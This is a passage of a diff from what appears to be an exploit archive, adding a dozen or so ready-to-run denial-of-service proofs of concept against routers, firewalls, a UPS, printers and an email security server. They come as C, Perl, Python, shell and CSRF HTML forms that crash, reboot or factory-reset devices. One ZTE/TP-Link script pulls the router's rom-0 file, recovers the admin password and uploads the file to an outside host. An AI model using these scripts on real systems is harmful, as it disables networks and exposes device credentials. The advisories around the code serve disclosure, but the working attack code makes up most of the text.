if( libnet_write_ip(sock, packet, len + IP_H) < (len + IP_H))
perror("write_ip: ");
else printf(".");
}
printf("\n\n");
return( 0 );
}

7
platforms/hardware/dos/19513.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/665/info
A vulnerability in the Diva LAN ISDN Modem allows remote malicious users to lock up the modem requiring a hard reset.
The vulnerability manifests itself when a remote users connects to the Diva HTTP port and sends a GET request of the form 'login.html?password=<very long string>'.
Enter the URL 'http://diva/login.htm?password=0123456789012345678901234567890123456789' into your browser, where 'diva' is the IP address of the modem.

237
platforms/hardware/dos/19919.c Executable file
View file

@ -0,0 +1,237 @@
source: http://www.securityfocus.com/bid/1211/info
Opening approximately 98 connections on port 23 will cause Cisco 760 Series Routers to self reboot. Continuously repeating this action will result in a denial of service attack.
/* Cisco 760 Series Connection Overflow
*
*
* Written by: Tiz.Telesup
* Affected Systems: Routers Cisco 760 Series, I havn't tested anymore
* Tested on: FreeBSD 4.0 and Linux RedHat 6.0
*/
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <net/if.h>
#include <netinet/in.h>
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, char *sourceip,
unsigned short int sourceport, int sec);
void net_write (int fd, const char *str, ...);
unsigned long int net_resolve (char *host);
void
usage (void)
{
printf ("usage: ./cisco host times\n");
exit (EXIT_FAILURE);
}
int
main (int argc, char *argv[])
{
char host[256];
int port,times,count,sd = 0;
int m = 0;
struct sockaddr_in cs;
printf ("Cisco 760 series Connection Overflow.\n");
printf ("-------------------------------------\n");
if (argc < 3)
usage();
strcpy (host, argv[1]);
times=atoi (argv[2]);
if ((times < 1) || (times > 10000)) /*Maximum number of connections*/
usage();
port =23; /* This might be changed to the telnet port of the router*/
printf ("Host: %s Times: %d\n", host, times);
for (count=0;count<times;count++){
printf ("Connecting... Connection number %d \n",count);
fflush (stdout);
sd = net_connect (&cs, host, port, NULL, 0, 30);
if (sd < 1) {
printf ("failed!\n");
exit (EXIT_FAILURE);
}
net_write (sd, "AAAA\n\n");
}
exit (EXIT_SUCCESS);
}
int
net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip,
unsigned short int sourceport, int sec)
{
int n, len, error, flags;
int fd;
struct timeval tv;
fd_set rset, wset;
/* first allocate a socket */
cs->sin_family = AF_INET;
cs->sin_port = htons (port);
fd = socket (cs->sin_family, SOCK_STREAM, 0);
if (fd == -1)
return (-1);
if (!(cs->sin_addr.s_addr = net_resolve (server))) {
close (fd);
return (-1);
}
flags = fcntl (fd, F_GETFL, 0);
if (flags == -1) {
close (fd);
return (-1);
}
n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1) {
close (fd);
return (-1);
}
error = 0;
n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
if (n < 0) {
if (errno != EINPROGRESS) {
close (fd);
return (-1);
}
}
if (n == 0)
goto done;
FD_ZERO(&rset);
FD_ZERO(&wset);
FD_SET(fd, &rset);
FD_SET(fd, &wset);
tv.tv_sec = sec;
tv.tv_usec = 0;
n = select(fd + 1, &rset, &wset, NULL, &tv);
if (n == 0) {
close(fd);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1)
return (-1);
if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
len = sizeof(error);
if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
errno = ETIMEDOUT;
return (-1);
}
if (error == 0) {
goto done;
} else {
errno = error;
return (-1);
}
}
} else
return (-1);
done:
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
return (fd);
}
unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;
i = inet_addr(host);
if (i == -1) {
he = gethostbyname(host);
if (he == NULL) {
return (0);
} else {
return (*(unsigned long *) he->h_addr);
}
}
return (i);
}
void
net_write (int fd, const char *str, ...)
{
char tmp[8192];
va_list vl;
int i;
va_start(vl, str);
memset(tmp, 0, sizeof(tmp));
i = vsnprintf(tmp, sizeof(tmp), str, vl);
va_end(vl);
send(fd, tmp, i, 0);
return;
}

9
platforms/hardware/dos/19923.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/1219/info
Large usernames or passwords sent to the router's HTTP interface restart the router. Router log will show "restart not in response to admin command"
Open the router interface with your browser.
Username: ......................... (x79 +)
After the router restarts, you can hit refresh on your browser to take it down again.
A simple script or program could be written to keep the router down indefinately.

6
platforms/hardware/dos/20090.txt Executable file
View file

@ -0,0 +1,6 @@
source: http://www.securityfocus.com/bid/1491/info
HP JetDirect firmware is vulnerable to a Denial of Service attack. JetDirect devices have an FTP service which fails to properly handle bad FTP commands sent with the ftp "quote" command. This causes the device to stop responding and possibly display an error message. Powering the device off and on is required to regain normal functionality.
ftp <printer address>
quote AAAAAAAAAAA

18
platforms/hardware/dos/20323.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/1838/info
Cisco devices running IOS software may be prone to a denial of service attack if a URL containing a question mark followed by a slash (?/) is requested. The device will enter an infinite loop when supplied with a URL containing a "?/" and an enable password. Subsequently, the router will crash in two minutes after the watchdog timer has expired and will then reload. In certain cases, the device will not reload and a restart would be required in order to regain normal functionality.
This vulnerability is restricted to devices that do not have the enable password set or if the password is known or can be easily predicted. The vulnerable service is only on by default in the Cisco 1003, 1004 and 1005 routers.
Users can identify vulnerable or invulnerable devices running IOS by logging onto the device and issuing the ?show version? command. If IOS is running on a vulnerable device the command will return ?Internetwork Operating System Software? or ?IOS (tm)? with a version number.
Vulnerable IOS software may be found on the following Cisco devices:
*Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 1400, 1500, 1600, 1700, 2500, 2600, 3000, 3600, 3800, 4000, 4500, 4700, AS5200, AS5300, AS5800, 6400, 7000, 7200, ubr7200, 7500, and 12000 series.
*Recent versions of LS1010 ATM switch.
*Catalyst 6000 with IOS.
*Catalyst 2900XL LAN switch with IOS.
*Cisco DistributedDirector.
http://target/anytext?/

64
platforms/hardware/dos/20332.pl Executable file
View file

@ -0,0 +1,64 @@
source: http://www.securityfocus.com/bid/1855/info
A vulnerability exists in the operating system of some Ascend routers. If an invalid TCP packet (of zero length) is sent to the administration port of Ascend Routers 4.5Ci12 or earlier, the result will be a crash and reboot of the attacked router, accomplishing a denial of service attack.
Note that 3Com is reportedly also vulnerable, but it is not verified which versions of IOS are exploitable.
#!/usr/bin/perl
#
# Ascend Kill II - perl version
# (C) 1998 Rootshell - http://www.rootshell.com/ - <info@rootshell.com>
#
# Released: 3/17/98
#
# Thanks to Secure Networks. See SNI-26: Ascend Router Security Issues
# (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html)
#
# NOTE: This program is NOT to be used for malicous purposes. This is
# intenteded for educational purposes only. By using this program
# you agree to use this for lawfull purposes ONLY.
#
#
use Socket;
require "getopts.pl";
sub AF_INET {2;}
sub SOCK_DGRAM {2;}
sub ascend_kill {
$remotehost = shift(@_);
chop($hostname = `hostname`);
$port = 9;
$SIG{'INT'} = 'dokill';
$sockaddr = 'S n a4 x8';
($pname, $aliases, $proto) = getprotobyname('tcp');
($pname, $aliases, $port) = getservbyname($port, 'tcp')
unless $port =~ /^\d+$/;
($pname, $aliases, $ptype, $len, $thisaddr) =
gethostbyname($hostname);
$this = pack($sockaddr, AF_INET, 0, $thisaddr);
($pname, $aliases, $ptype, $len, $thataddr) = gethostbyname($remotehost);
$that = pack($sockaddr, AF_INET, $port, $thataddr);
socket(S, &AF_INET, &SOCK_DGRAM, 0);
$msg = pack("c64",
0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00,
0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e,
0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53,
0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44,
0x50, 0x41, 0x53, 0x53);
for ($i=0; $i<500; $i++) {
$msg .= pack("c1", 0xff);
}
send(S,$msg,0,$that) || die "send:$!";
}
if ($ARGV[0] eq '') {
print "usage: akill2.pl <remote_host>\n";
exit;
}
&ascend_kill($ARGV[0]);

49
platforms/hardware/dos/20654.pl Executable file
View file

@ -0,0 +1,49 @@
source: http://www.securityfocus.com/bid/2430/info
Symmetra is an Uninterruptable Power Supply manufactured by American Power Conversation Corporation (APC). Symmetra supports network options that allow a remote administrator to access the system via telnet, and gather information from the power supply via SNMP.
A problem with the network software used with the Symmetra can allow a denial of service to the system, thus preventing administrative access. This problem is due to the handling of the telnet protocol by the firmware of the power supply. The system does not support more than one telnet session at a time, and when it encounters three failed login attempts, discontinues access for a configurable period between 1 and 10 minutes.
Therefore, it is possible for a malicious user to launch an remote attack against the telnet service of the power supply, and prevent administrative access to the power supply for the duration of the attack. This vulnerability may affect other APC UPS products as well.
#!/usr/bin/perl
#altomo@nudehackers.com
#apc management card dos
$user = "blacksun";
$time = "$ARGV[1]";
use IO::Socket;
$ip = "$ARGV[0]";
$port = "23";
if ($#ARGV<0) {
print " useage: $0 <hostname> <delay in seconds>\n";
exit();
}
$socket = IO::Socket::INET->new(
Proto=>"tcp",
PeerAddr=>$ip,
PeerPort=>$port,);
print "Apc management card DoS\n";
print "altomo\@nudehackers.com\n";
sub dos() {
print "DoS started will attack every $time seconds\n";
print "Ctrl+C to exit\n";
print $socket "$user\r";
print $socket "$user\r";
print $socket "$user\r";
print $socket "$user\r";
print $socket "$user\r";
print $socket "$user\r";
print "\n";
close $socket;
sleep($time);
&dos;
}
&dos;
#hong kong danger duo

14
platforms/hardware/dos/20734.sh Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/2551/info
PIX is an enterprise firewall engineered and maintained by Cisco Systems. It is designed to provide robust features and multiple methods of access control and filtering.
A problem with the PIX could allow a denial of service. PIX firewalls using TACACS+ are vulnerable to a resource starvation attack which results in a denial of service. Upon receiving multiple requests for TACACS+ authentication from an unauthorized user, the firewalls resources can be exhausted. This causes the firewall to crash, requiring power cycling to resume regular service.
This makes it possible for a user from either the public or private side of the PIX to crash the firewall, and deny service to legitimate users.
All PIX Firewalls having configuration lines beginning with the following line are affected:
pixfirewall# aaa authentication
Any configurations not including aaa authentication are not affected.
while (true); do (wget http://external.system 2>/dev/null &); done

95
platforms/hardware/dos/27775.py Executable file
View file

@ -0,0 +1,95 @@
#!/usr/bin/python
################################################################
# #
# Netgear ProSafe - CVE-2013-4776 PoC #
# written by Juan J. Guelfo @ Encripto AS #
# post@encripto.no #
# #
# Copyright 2013 Encripto AS. All rights reserved. #
# #
# This software is licensed under the FreeBSD license. #
# http://www.encripto.no/tools/license.php #
# #
################################################################
import sys, getopt, urllib2
from subprocess import *
__version__ = "0.1"
__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"
# Prints title and other header info
def header():
print ""
print " ================================================================= "
print "| Netgear ProSafe - CVE-2013-4776 PoC \t\t\t\t |".format(__version__)
print "| by {0}\t\t |".format(__author__)
print " ================================================================= "
print ""
# Prints help
def help():
header()
print """
Usage: python CVE-2013-4776.py [mandatory options]
Mandatory options:
-t target ...Target IP address
-p port ...Port where the HTTP admin interface is listening on
Example:
python CVE-2013-4776.py -t 192.168.0.1 -p 80
"""
sys.exit(0)
if __name__ == '__main__':
#Parse options
try:
options, args = getopt.getopt(sys.argv[1:], "t:p:", ["target=", "port="])
except getopt.GetoptError, err:
header()
print "\n[-] Error: {0}.\n".format(str(err))
sys.exit(1)
if not options:
help()
target = None
port = None
for opt, arg in options:
if opt in ("-t"):
target = arg
if opt in ("-p"):
port = arg
#Option input validation
if not target or not port:
help()
print "[-] Error: Incorrect syntax.\n"
sys.exit(1)
header()
headers = { "User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" }
try:
# Get the startup config via HTTP admin interface
print "[+] Triggering DoS condition..."
r = urllib2.Request('http://%s:%s/filesystem/' % (target, port), None, headers)
urllib2.urlopen(r,"",5).read()
except urllib2.URLError:
print "[-] Error: The connection could not be established.\n"
except:
print "[+] The switch should be freaking out..."
print "[+] Reboot the switch (unplug the power cord) to get it back to normal...\n"
sys.exit(0)

33
platforms/hardware/dos/30688.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: Motorola SBG6580 Cable Modem & Wireless-N Router Denial of Service
# Date: 01/03/14
# Exploit Author: nicx0
# Vendor Homepage: http://www.motorola.com/
# Software Link: http://www.motorola.com/us/SBG6580-SURFboard%C2%AE-eXtreme-Wireless-Cable-Modem/70902.html
# Version: SBG6580-6.5.0.0-GA-00-226-NOSH
# POSTing a bad login page parameter causes the router to reboot.
import sys
import socket
import urllib2
import urllib
router_ip = ''
try:
router_ip = str(sys.argv[1])
except:
print 'motobug.py ip_address : e.g. motobug.py 192.168.0.1'
sys.exit(2)
query_args = {'this_was':'too_easy'}
url = 'http://' + router_ip + '/goform/login'
post_data = urllib.urlencode(query_args)
request = urllib2.Request(url, post_data)
try:
print '[+] Sending invalid POST request to ' + url + '...'
response = urllib2.urlopen(request,timeout=5)
except socket.timeout:
print '[+] Success! No response from the modem.'
except urllib2.HTTPError:
print '[-] Failed: HTTP error received. The modem might not be a SBG6580.'
except urllib2.URLError:
print '[-] Failed: URL error received. Check the IP address again..'
else:
print '[-] Failed: HTTP response received. Modem does not appear to be vulnerable.'

363
platforms/hardware/dos/33737.py Executable file
View file

@ -0,0 +1,363 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: ZTE and TP-Link RomPager DoS Exploit
# Date: 10-05-2014
# Server Version: RomPager/4.07 UPnP/1.0
# Tested Routers: ZTE ZXV10 W300
# TP-Link TD-W8901G
# TP-Link TD-W8101G
# TP-Link TD-8840G
# Firmware: FwVer:3.11.2.175_TC3086 HwVer:T14.F7_5.0
# Tested on: Kali Linux x86
#
# Notes: Please note this exploit may contain errors, and
# is provided "as it is". There is no guarantee
# that it will work on your target router(s), as
# the code may have to be adapted.
# This is to avoid script kiddie abuse as well.
#
# Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only.
# Author takes no responsibility for any kind of damage you cause.
#
# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
#
# Original write-up: https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/
# Video: https://www.youtube.com/watch?v=1fSECo2ewoo
# Dedicate to Nick Knight and Hood3dRob1n
#
# ./dos.py -i 192.168.1.1
import os
import re
import sys
import time
import urllib
import base64
import httplib
import urllib2
import requests
import optparse
import telnetlib
import subprocess
import collections
import unicodedata
class BitReader:
def __init__(self, bytes):
self._bits = collections.deque()
for byte in bytes:
byte = ord(byte)
for n in xrange(8):
self._bits.append(bool((byte >> (7-n)) & 1))
def getBit(self):
return self._bits.popleft()
def getBits(self, num):
res = 0
for i in xrange(num):
res += self.getBit() << num-1-i
return res
def getByte(self):
return self.getBits(8)
def __len__(self):
return len(self._bits)
class RingList:
def __init__(self, length):
self.__data__ = collections.deque()
self.__full__ = False
self.__max__ = length
def append(self, x):
if self.__full__:
self.__data__.popleft()
self.__data__.append(x)
if self.size() == self.__max__:
self.__full__ = True
def get(self):
return self.__data__
def size(self):
return len(self.__data__)
def maxsize(self):
return self.__max__
def __getitem__(self, n):
if n >= self.size():
return None
return self.__data__[n]
def filter_non_printable(str):
return ''.join([c for c in str if ord(c) > 31 or ord(c) == 9])
def banner():
return '''
\t\t _/_/_/ _/_/_/
\t\t _/ _/ _/_/ _/
\t\t _/ _/ _/ _/ _/_/
\t\t _/ _/ _/ _/ _/
\t\t_/_/_/ _/_/ _/_/_/
'''
def dos(host, password):
while (1):
url = 'http://' +host+ '/Forms/tools_test_1'
parameters = {
'Test_PVC' : 'PVC0',
'PingIPAddr' : '\101'*2000,
'pingflag' : '1',
'trace_open_flag' : '0',
'InfoDisplay' : '+-+Info+-%0D%0A'
}
params = urllib.urlencode(parameters)
req = urllib2.Request(url, params)
base64string = base64.encodestring('%s:%s' % ('admin', password)).replace('\n', '')
req.add_header("Authorization", "Basic %s" %base64string)
req.add_header("Content-type", "application/x-www-form-urlencoded")
req.add_header("Referer", "http://" +host+ "/maintenance/tools_test.htm")
try:
print '[~] Sending Payload'
response = urllib2.urlopen(req, timeout=1)
sys.exit(0)
except:
flag = checkHost(host)
if flag == 0:
print '[+] The host is still up and running'
else:
print '[~] Success! The host is down'
sys.exit(0)
break
def checkHost(host):
if sys.platform == 'win32':
c = "ping -n 2 " + host
else:
c = "ping -c 2 " + host
try:
x = subprocess.check_call(c, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
time.sleep(1)
return x
except:
pass
def checkServer(host):
connexion = httplib.HTTPConnection(host)
connexion.request("GET", "/status.html")
response = connexion.getresponse()
server = response.getheader("server")
connexion.close()
time.sleep(2)
if server == 'RomPager/4.07 UPnP/1.0':
return 0
else:
return 1
def checkPassword(host):
print '[+] Checking for default password'
defaultpass = 'admin'
tn = telnetlib.Telnet(host, 23, 4)
tn.read_until("Password: ")
tn.write(defaultpass + '\n')
time.sleep(2)
banner = tn.read_eager()
banner = regex(len(defaultpass)*r'.'+'\w+' , banner)
tn.write("exit\n")
tn.close()
time.sleep(4)
if banner == 'Copyright':
print '[+] Default password is being used'
dos(host, defaultpass)
else:
print '[!] Default Password is not being used'
while True:
msg = str(raw_input('[?] Decrypt the rom-0 file locally? ')).lower()
try:
if msg[0] == 'y':
password = decodePasswordLocal(host)
print '[*] Router password is: ' +password
dos(host, password)
break
if msg[0] == 'n':
password = decodePasswordRemote(host)
print '[*] Router password is: ' +password
dos(host, password)
break
else:
print '[!] Enter a valid choice'
except Exception, e:
print e
continue
def decodePasswordRemote(host):
fname = 'rom-0'
if os.path.isfile(fname) == True:
os.remove(fname)
urllib.urlretrieve ("http://"+host+"/rom-0", fname)
# If this URL goes down you might have to find one and change this function.
# You can also use the local decoder. It might have few errors in getting output.
url = 'http://198.61.167.113/zynos/decoded.php' # Target URL
files = {'uploadedfile': open('rom-0', 'rb') } # The rom-0 file we wanna upload
data = {'MAX_FILE_SIZE': 1000000, 'submit': 'Upload rom-0'} # Additional Parameters we need to include
headers = { 'User-agent' : 'Python Demo Agent v1' } # Any additional Headers you want to send or include
res = requests.post(url, files=files, data=data, headers=headers, allow_redirects=True, timeout=30.0, verify=False )
res1 =res.content
p = re.search('rows=10>(.*)', res1)
if p:
passwd = found = p.group(1)
else:
password = 'NotFound'
return passwd
def decodePasswordLocal(host):
# Sometimes this might output a wrong password while finding the exact string.
# print the result as mentioned below and manually find out
fname = 'rom-0'
if os.path.isfile(fname) == True:
os.remove(fname)
urllib.urlretrieve ("http://"+host+"/rom-0", fname)
fpos=8568
fend=8788
fhandle=file('rom-0')
fhandle.seek(fpos)
chunk="*"
amount=221
while fpos < fend:
if fend-fpos < amount:
amount = amount
data = fhandle.read(amount)
fpos += len(data)
reader = BitReader(data)
result = ''
window = RingList(2048)
while True:
bit = reader.getBit()
if not bit:
char = reader.getByte()
result += chr(char)
window.append(char)
else:
bit = reader.getBit()
if bit:
offset = reader.getBits(7)
if offset == 0:
break
else:
offset = reader.getBits(11)
lenField = reader.getBits(2)
if lenField < 3:
lenght = lenField + 2
else:
lenField <<= 2
lenField += reader.getBits(2)
if lenField < 15:
lenght = (lenField & 0x0f) + 5
else:
lenCounter = 0
lenField = reader.getBits(4)
while lenField == 15:
lenField = reader.getBits(4)
lenCounter += 1
lenght = 15*lenCounter + 8 + lenField
for i in xrange(lenght):
char = window[-offset]
result += chr(char)
window.append(char)
result = filter_non_printable(result).decode('unicode_escape').encode('ascii','ignore')
# In case the password you see is wrong while filtering, manually print it from here and findout.
#print result
if 'TP-LINK' in result:
result = ''.join(result.split()).split('TP-LINK', 1)[0] + 'TP-LINK';
result = result.replace("TP-LINK", "")
result = result[1:]
if 'ZTE' in result:
result = ''.join(result.split()).split('ZTE', 1)[0] + 'ZTE';
result = result.replace("ZTE", "")
result = result[1:]
if 'tc160' in result:
result = ''.join(result.split()).split('tc160', 1)[0] + 'tc160';
result = result.replace("tc160", "")
result = result[1:]
return result
def regex(path, text):
match = re.search(path, text)
if match:
return match.group()
else:
return None
def main():
if sys.platform == 'win32':
os.system('cls')
else:
os.system('clear')
try:
print banner()
print '''
|=--------=[ ZTE and TP-Link RomPager Denial of Service Exploit ]=-------=|\n
[*] Author: Osanda Malith Jayathissa
[*] Follow @OsandaMalith
[!] Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only.
[!] Author takes no responsibility for any kind of damage you cause.
'''
parser = optparse.OptionParser("usage: %prog -i <IP Address> ")
parser.add_option('-i', dest='host',
type='string',
help='Specify the IP to attack')
(options, args) = parser.parse_args()
if options.host is None:
parser.print_help()
exit(-1)
host = options.host
x = checkHost(host)
if x == 0:
print '[+] The host is up and running'
server = checkServer(host)
if server == 0:
checkPassword(host)
else:
print ('[!] Sorry the router is not running RomPager')
else:
print '[!] The host is not up and running'
sys.exit(0)
except KeyboardInterrupt:
print '[!] Ctrl + C detected\n[!] Exiting'
sys.exit(0)
except EOFError:
print '[!] Ctrl + D detected\n[!] Exiting'
sys.exit(0)
if __name__ == "__main__":
main()
#EOF

30
platforms/hardware/dos/34172.txt Executable file
View file

@ -0,0 +1,30 @@
# Title : Sagem F@st 3304-V1 denial of service Vulnerability
# Vendor Homepage : http://www.sagemcom.com
# Tested on : Firefox, Google Chrome
# Tested Router : Sagem F@st 3304-V1
# Date : 2014-07-26
# Author : Z3ro0ne
# Contact : saadousfar59@gmail.com
# Facebook Page : https://www.facebook.com/Z3ro0ne
# Vulnerability description :
the Vulnerability allow unauthenticated users to remotely restart and reset the router
# Exploit:
<html>
<title>SAGEM FAST3304-V1 DENIAL OF SERVICE</title>
<body>
<FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale">
<INPUT TYPE="SUBMIT" VALUE="REBOOT ROUTER">
</FORM>
<FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale">
<INPUT TYPE="SUBMIT" VALUE="FACTORY RESET">
</FORM>
</body>
</html>
Reset to factory configuration :
--- Using Google Chrome browser :
to reset the router without any authentication just execute the following url http://ROUTER-ipaddress/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale in the url bar

112
platforms/hardware/dos/34203.txt Executable file
View file

@ -0,0 +1,112 @@
Exploit Title: Dlink DWR-113 Rev. Ax - CSRF causing Denial of Service
Google dork : N/A
Exploit Author: Blessen Thomas
Date : 29/07/14
Vendor Homepage : http://www.dlink.com/
Software Link : N/A
Firmware version: v2.02 2013-03-13
Tested on : Windows 7
CVE : CVE-2014-3136
Type of Application : Web application
Release mode : Coordinated disclosure
Vulnerability description:
It was observed that the D-link DWR-113 wireless router is vulnerable to
denial of service attack via CSRF(Cross-Site Request Forgery) vulnerability.
An attacker could craft a malicious CSRF exploit to change the password in
the password functionality when the user(admin) is logged in to the
application ,as the user interface (admin panel) lacks the csrf token or
nonce to prevent an attacker to change the password.
As a result, as soon as the crafted malicious exploit is executed the
router is rebooted and the user could not login thus forcing to reset the
routers device physically ,leading to a denial of service condition.
POC code (exploit) :
*Restart Router by CSRF*
<html>
<!-- CSRF PoC --->
<body>
<form action="http://192.168.0.1/rebo.htm">
<input type="hidden" name="S00010002" value="test" />
<input type="hidden" name="np2" value="test" />
<input type="hidden" name="N00150004" value="0" />
<input type="hidden" name="N00150001" value="" />
<input type="hidden" name="N00150003" value="1080" />
<input type="hidden" name="_cce" value="0x80150002" />
<input type="hidden" name="_sce" value="%Ssc" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Tools used :
Mozilla firefox browser v28.0 , Burp proxy free edition v1.5
Timeline :
06-04-14 : Contacted Vendor with details of Vulnerability and Exploit.
06-04-14 : Vendor D-Link forwards to R&D team for review
29-04-14 : Vendor contacted to know the status.
01-05-14 : Vendor acknowledged and released a patch
01-05-14 : CVE ID provided by Mitre team.
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10034

57
platforms/hardware/dos/35345.txt Executable file
View file

@ -0,0 +1,57 @@
TP-Link TL-WR740N Wireless Router MitM httpd Denial Of Service
Vendor: TP-LINK Technologies Co., Ltd.
Product web page: http://www.tp-link.us
Affected version:
- Firmware version: 3.17.0 Build 140520 Rel.75075n (Released: 5/20/2014)
- Firmware version: 3.16.6 Build 130529 Rel.47286n (Released: 5/29/2013)
- Firmware version: 3.16.4 Build 130205 Rel.63875n (Released: 2/5/2013)
- Hardware version: WR740N v4 00000000 (v4.23)
- Model No. TL-WR740N / TL-WR740ND
Summary: The TL-WR740N is a combined wired/wireless network connection
device integrated with internet-sharing router and 4-port switch. The
wireless N Router is 802.11b&g compatible based on 802.11n technology
and gives you 802.11n performance up to 150Mbps at an even more affordable
price. Bordering on 11n and surpassing 11g speed enables high bandwidth
consuming applications like video streaming to be more fluid.
Desc: The TP-Link WR740N Wireless N Router network device is exposed to a
denial of service vulnerability when processing a HTTP GET request. This
issue occurs when the web server (httpd) fails to handle a HTTP GET request
over a given default TCP port 80. Resending the value 'new' to the 'isNew'
parameter in 'PingIframeRpm.htm' script to the router thru a proxy will
crash its httpd service denying the legitimate users access to the admin
control panel management interface. To bring back the http srv and the
admin UI, a user must physically reboot the router.
Tested on: Router Webserver
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5210
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5210.php
13.11.2014
---
Replay
GET /userRpm/PingIframeRpm.htm?ping_addr=zeroscience.mk&doType=ping&isNew=new&lineNum=1 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/userRpm/PingIframeRpm.htm?ping_addr=zeroscience.mk&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive

127
platforms/hardware/dos/9980.txt Executable file
View file

@ -0,0 +1,127 @@
_________________________________________
Security Advisory NSOADV-2009-002
_________________________________________
_________________________________________
Title: Websense Email Security Web Administrator DoS
Severity: Low
Advisory ID: NSOADV-2009-002
Found Date: 28.09.2009
Date Reported: 01.10.2009
Release Date: 20.10.2009
Author: Nikolas Sotiriu
Mail: nso-research (at) sotiriu.de
URL: http://sotiriu.de/adv/NSOADV-2009-002.txt
Vendor: Websense (http://www.websense.com/)
Affected Products: Websense Email Security v7.1
Personal Email Manager v7.1
Not Affected Products: Websense Email Security v7.1 Hotfix 4
Personal Email Manager v7.1 Hotfix 4
Remote Exploitable: Yes
Local Exploitable: Yes
Patch Status: Patched with Hotfix 4
Disclosure Policy: http://sotiriu.de/policy.html
Thanks to: Thierry Zoller: for the permission to use his
Policy
Background:
===========
Websense Email Security software incorporates multiple layers of
real-time Web security and data security intelligence to provide
leading email protection from converged email and Web 2.0 threats.
It helps to manage outbound data leaks and compliance risk, and enables
a consolidated security strategy with the trusted leader in Essential
Information Protection.
(Product description from Websense Website)
The Websense Email Security Web Administrator is a webfrontend, which
enables you to access the message administration, directory management
and to view the log.
Description:
============
The Web Administrator frontend (STEMWADM.EXE) listens by default on port
TCP/8181.
If an attacker sends a HTTP Request to port 8181 without waiting for a
response the webserver crashes. The proof of concept script just sends
a "GET /index.asp" and closes the socket. The server can not response
to the request anymore and dies.
By default the service will always restart after a crash. So the poc
will send the request until it will be stopped.
Proof of Concept :
==================
#!/usr/bin/perl
use Socket;
(($target = $ARGV[0]) && ($port = $ARGV[1])) || die "Usage: $0 ",
"<target> <port> \n";
print "\nThe Webserver on http://$target:$port should be dead until",
"this script is running\n";
while (1) {
$ip = inet_aton($target) || die "host($target) not found.\n";
$sockaddr = pack_sockaddr_in($port, $ip);
socket(SOCKET, PF_INET, SOCK_STREAM, 0) || die "socket error.\n";
connect(SOCKET, $sockaddr) || die "connect $target $port error.\n";
print SOCKET "GET /index.asp";
print "Request sent ...\n";
close(SOCKET);
sleep 1;
};
Solution:
=========
Vendor released a patch.
http://tinyurl.com/yhe3hqa
Disclosure Timeline (YYYY/MM/DD):
=================================
2009.09.28: Vulnerability found
2009.10.01: Ask for a PGP Key
2009.10.01: Websense sent there PGP Key
2009.10.01: Sent PoC, Advisory, Disclosure policy and planned disclosure
date to Vendor
2009.10.08: Websense was not able to reproduce the DoS Problem
2009.10.08: Sent a mail with more explanation
2009.10.13: Websense verifies the finding and fixed it. The path will be
available in Version 7.2 which will be released in ~2 weeks
2009.10.13: Ask for a list of affected versions/products and changed the
release date to 2009.10.29.
(no response)
2009.10.20: Found the KB article and the Hotfix on Websense website
2009.10.20: Release of this advisory

180
platforms/hardware/remote/20331.c
View file

@ -1,180 +0,0 @@
source: http://www.securityfocus.com/bid/1855/info
